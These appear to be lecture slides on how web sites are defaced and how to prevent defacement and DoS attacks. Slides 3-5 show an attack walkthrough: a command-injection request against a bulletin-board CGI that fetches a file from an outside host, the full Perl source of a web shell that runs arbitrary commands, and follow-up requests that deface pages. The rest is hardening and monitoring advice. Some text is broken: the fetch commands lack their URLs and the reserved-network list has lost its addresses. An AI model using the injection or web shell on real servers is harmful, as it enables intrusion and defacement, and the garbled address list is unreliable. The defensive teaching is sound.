Author: 仪签 骆

1 Web Site Information
If a web site has been defaced, chances are the attacker(s) visited the web site prior to the attack. The purpose of these visits was system reconnaissance. Inappropriate information stored on the web site can aid in a direct attack and/or in an indirect attack such as social engineering. Directory structures, filenames and even the HTML code itself can all contain valuable system information. The intruder will often use automated scripts or applications to download the target's web content and then scour through the HTML files offline. Teleport Pro and wget are two popular automated tools for web site mirroring and reconnaissance.

2 Teleport Pro Example

3 Example Attack 1
This is a rough summary of an actual attack on the web site of InfoReading. It began with the hacker requesting a GET on the URL:

    /board//postings.cgi?action=reply&forum=geekout&number=1&topic= |lynx -source > ubbtest.cgi|mail

The hacker is taking advantage of a flaw in the Ultimate Bulletin Board system InfoReading used. In this case, he is piping the output of the bulletin board, allowing him to execute arbitrary commands on the system.

4 Example Attack 2
The hacker executed the command:

    lynx -source > ubbtest.cgi|mail

which took the contents of the page1.cgi file from galaktica.org and overwrote the contents of ubbtest.cgi with that file. He then mailed himself the results. The new file:

    #!/usr/bin/perl
    # uses the CGI module (like a C #include <> statement)
    use CGI;
    # creates a new CGI object
    $in = new CGI;
    # read the "cmd" argument that was passed to it by the browser
    $file = $in->param('cmd');
    # print the return header type
    print "Content-Type: text/html\n\n";
    # open the file; the "|" at the end indicates that this is an executable
    # whose output perl will be reading
    open (FILE, "$file|");
    # and finally, loop through each line of FILE and print the results
    while (<FILE>) { print $_; }

5 Example Attack 3
The following line was used to 'chmod' the file, marking it as executable:

    GET /board//postings.cgi?action=reply&forum=geekout&number=1&topic= |chmod 755 ubbtest.cgi|mail

Now he has a fully executable customized CGI to run whatever he wants. At this point he performed 2 actions, getting an index.html file and a Shockwave animation:

    GET /board/ubbtest.cgi?cmd=lynx -source > ../index.html
    GET /board/ubbtest.cgi?cmd=lynx -source > ../Movie2.swf

6 Preventing Web Defacements

7 Harden the OS
The symbiotic relationship between a Web server and its underlying OS cannot be overstated. Both the Web server and the OS could potentially be used to exploit each other. For instance, a vulnerable version of the BIND daemon could give an attacker command-line access to the system, and this unauthorized access could put the web site's contents in jeopardy. Conversely, a web server running a vulnerable version of the CGI script PHF could allow an intruder to illegally access the OS password file. Addressing the security concerns of a Web server while ignoring the system OS is akin to locking the front door of a house while leaving the back door wide open. Therefore, it is imperative to harden the OS to truly prevent a web site defacement.

8 Harden the Web Server
Unfortunately, most web servers' default settings are not adequate for deployment on today's Internet. Usually these defaults are configured with a much too open mindset. The opposite should be true: default access controls should start off with total restriction, and access rights should then be applied appropriately.

9 Do Not Run the Web Server as Root
When a web server is first started, it operates with the privileges of a specified OS user. All of the child processes that the web server then spawns run with the privileges of this system user. Attackers often scan for web servers searching for one running as the "root" system user. Nmap has a runtime flag (-I) that queries a server for the application owner: if the target is running the Ident service, it will announce which OS user owns each network application.

10 Nmap Example

    bash-2.03$ nmap -sT -p 80 -I -O www.hostname.com
    Starting nmap V.2.12 by Fyodor
    Interesting ports on (xxx.xxx.xxx.xxx):
    Port    State   Protocol  Service  Owner
    80      open    tcp       http     root
    TCP Sequence Prediction: Class=random positive increments
                             Difficulty=
    Remote operating system guess: Linux 2.2.0-pre
    Nmap run completed -- 1 IP address (1 host up) scanned in 1 second

11 Ownership/Permissions
Create specific users to run Web services:
- webserver: runs the Web server
- webadmin: owns config/log files
- webdev: owns web content
Determine each user's responsibility, then apply Web ownership and permissions appropriately.
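One way to verify the model on slides 9 and 11 (the server process runs as an unprivileged user that owns none of the content), added here as an example that is not from the original slides; it assumes only POSIX find, and the user name "webserver" is the slide's own example:

```shell
#!/bin/sh
# Added example (not from the original slides): check a document root against
# the ownership model on the slide (webserver runs the daemon, webadmin owns
# config/logs, webdev owns content). Whatever the runtime user can write is what
# a compromised server process could deface, so list every path that is owned
# by that user or writable by everyone. POSIX find only; "webserver" is the
# slide's example user name.

audit_webroot() {   # $1 = docroot, $2 = web server runtime user
    if id "$2" >/dev/null 2>&1; then
        find "$1" \( -user "$2" -o -perm -o=w \) -print
    else
        # the user does not exist on this host: only the world-writable check applies
        find "$1" -perm -o=w -print
    fi | sort
}

# Expected layout (example): content 644/755 owned by webdev, config and logs
# owned by webadmin, nothing owned or writable by webserver. Usage:
#   audit_webroot /var/www webserver
```

An empty result is the goal; every path printed is one the running server could rewrite by itself.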

12 Automatic Directory Listing
Automatic directory listing is a server function that lists all of the files within a requested directory if the normal base file (index.html/home.html/default.html) is not present. When a user requests the main page of a web site, they normally type in just the site's base URL. The web server processes this request, searches the document root directory for the file named index.html and sends this page to the client. If this page is not present, the web server will instead issue a directory listing and send the output to the client. Turn off automatic directory listing: directory listings reveal too much information about a web site's content and directory structure.

13 Preventing Invalid Displays 1
Change the name of the default index page, away from index.html or default.html. The normal index directive in iPlanet is:

    PathCheck fn="find-index" indexnames="index.htm,index.html"

Change it to something else:

    PathCheck fn="find-index" indexnames="main.htm,main.html"

This deters "assumption" attacks: the attacker assumes that the default page is named index.html, so using URL exploits to deface the main web page becomes very difficult.

14 Preventing Invalid Displays 2
Taking it one step further, use a typical BlackHat naming tactic: non-printable characters. Rootkits name their directories ". " (dot, space, space) or ".. " (dot, dot, space, space). Use the same idea for naming the default file:

    mv index.htm "index.htm "

Notice the space after the htm/html?

15 Monitor Changes
How can you be immediately notified if content changes? Run a shell script continuously in the background to monitor HTML page properties:
- Size
- Owner/Group
- Permissions
- Last Access Time
It compares the stats against those of the last run and checks for differences. If differences are found, it sends an email to the SysAdmins with vital info:
- Files changed
- Who is logged in
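A change monitor of the kind this slide describes, added here as an example (it is not code from the original slides); it assumes GNU coreutils/findutils, and the state directory, mail recipient and the MAILER override are placeholders of mine:

```shell
#!/bin/sh
# Added example (not from the original slides): snapshot size, owner/group,
# permissions and modification time of every HTML file under a docroot,
# compare with the previous run, and mail the changed files plus who is
# logged in. Assumes GNU coreutils/findutils (stat -c, sort -z, xargs -r);
# mtime (%Y) is used rather than access time, which relatime mounts rarely
# update. The state dir, recipient and MAILER override are placeholders.

snapshot_html() {   # $1 = docroot, $2 = snapshot file to write
    find "$1" -type f \( -name '*.html' -o -name '*.htm' \) -print0 \
        | sort -z \
        | xargs -0 -r stat -c '%s %U:%G %a %Y %n' > "$2"
}

changed_files() {   # $1 = previous snapshot, $2 = current snapshot
    # A line found in only one snapshot belongs to a file that changed, appeared
    # or vanished. The path is field 5 onward (%n may contain spaces); a changed
    # file contributes one line per snapshot, so dedupe the paths.
    sort "$1" "$2" | uniq -u | cut -d' ' -f5- | sort -u
}

report_changes() {  # $1 = docroot, $2 = changed paths, $3 = recipient
    {
        echo "HTML content changed under $1 on $(uname -n):"
        echo "$2"
        echo
        echo "Users currently logged in:"
        who
    } | ${MAILER:-mail} -s "Web content change on $(uname -n)" "$3"
}

monitor_once() {    # $1 = docroot, $2 = state dir, $3 = recipient; returns 1 if changed
    mkdir -p "$2"
    snapshot_html "$1" "$2/current.snap"
    rc=0
    if [ -f "$2/last.snap" ]; then
        changed=$(changed_files "$2/last.snap" "$2/current.snap")
        if [ -n "$changed" ]; then
            report_changes "$1" "$changed" "$3"
            rc=1
        fi
    fi
    mv "$2/current.snap" "$2/last.snap"
    return $rc
}

# Background loop as on the slide (placeholder paths and recipient):
#   while :; do monitor_once /var/www /var/lib/webmon webmaster@example.com; sleep 60; done
```

Keep the state directory outside the document root and unwritable by the web server user, otherwise the snapshot itself can be tampered with along with the content.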

16 General Defenses (what to do to prepare for any attack)
The most general form of defense against any and all attacks is:
- Increase user awareness
- Maintain and patch all software
- Maintain and update anti-virus software
- Audit the system on a regular basis
- Install a firewall
- Install an IDS

17 DoS Defense
Protecting a network and systems from DoS attacks centers around three topics:
- Designing the network and systems for survivability
- Monitoring ongoing operations: knowing what's "normal" for your network so that you can detect changes to this normal behavior
- Preparing the organization in nontechnical ways so personnel are prepared to react effectively

18 General Principles of Survivability
- Separate, or compartmentalize, critical services wherever practical.
- Overprovision as much as possible. Have more capacity than you need on a typical day, to the extent permitted by your constraints of time, money, resources, or complexity.
- Minimize your "target cross-section." A well-implemented network can present a small target to attackers by limiting publicly visible systems and services to the minimum required to meet the business needs of the organization.

19 Separation
The separation of critical services from noncritical services can occur on many levels. At the physical layer, you might use redundant links, each connected to different ISPs via different carrier networks routed through diverse paths. You can gain further redundancy by using multiple data centers or hosting locations. At the link layer, separation could involve the isolation of broadcast and/or collision domains through the use of multiple hubs, switches, VLANs or ELANs; this helps reduce the risk of "ARP storms" during heavy scanning events or DoS attacks. At the network layer, IP subnetting allows for increased control of traffic between systems, thereby limiting the damage an attack on one system or subnet can do to another. Subnetting can also help isolate publicly visible systems and services from internal systems by establishing a DMZ (demilitarized zone) between the external and internal networks.

20 Overprovision
To keep your systems operating during a period of heavy load, you need more computing capacity than your organization normally requires. You need to make provisions for sudden surges in network traffic, regardless of their source. Extra capacity may take many forms—bandwidth, memory, processor speed, TCP connection buffers, and other resources.

21 Minimize the Target
Reducing the target you present to a potential attacker can be achieved through a number of methods. The primary objectives are to present a small initial target and to limit the damage that an attack on that target can do.

22 Disable Unnecessary Services
One method of minimizing the target "cross-section" is to disable all unnecessary services. As an application of the "principle of least privilege," all services that are not expressly required for business operations should be disabled. Many operating systems have numerous services enabled by default, unnecessarily exposing networks to attacks that aren't even related to the particular service they intend (or need) to provide.

23 Hide Information
Hide the internals of your network. In many situations, there is little need for external users to be able to gather information about internal network configurations. Split DNS, Network Address Translation (NAT), and blocking ICMP messages at the network edges can be effective methods to reduce the leakage of internal configuration details to the outside world.

24 Filter Traffic
Filter all non-essential traffic as close to the source as possible. By dropping unneeded traffic as early as possible in a network (through the use of ingress and egress filtering), the impact of a DoS attack may be limited to the edges of the network. When done properly, traffic filtering can help protect your systems from being overloaded by intercepting the attack upstream, and it can limit the risk of attackers using your systems for an attack on another site.

25 Example Filters
- Configure routers to deny IP broadcast traffic onto your network from other networks. In almost all cases, IP-directed broadcast functionality is not needed. This is especially effective against Smurf attacks.
- Configure hosts NOT to reply to a packet sent to a broadcast address.
- Egress filtering: routers drop packets that would leave your domain (or subnet!) with a source address that has not been assigned to sources in your domain.
- Ingress filtering: routers drop packets from subdomains as they enter the host if the packets are not addressed properly.

26 Invalid Addresses
The following networks are defined as reserved private networks, and no traffic should ever be received from or transmitted to these networks through a router: to (reserved) to (loopback) to (reserved) to (reserved) and (broadcasts)

27 Principle One: Survivability
Survivability is the ability of a network computing system to provide essential services in the presence of attacks and failures, and to recover full services in a timely manner. The main objective of designing networks and systems to protect against DoS attacks is to keep critical services operational as long as possible during an attack. In some cases, that may not be enough, since the attacker may be able to completely overwhelm your network's capacity. In that event, however, the issue becomes a business continuity issue rather than a technical one.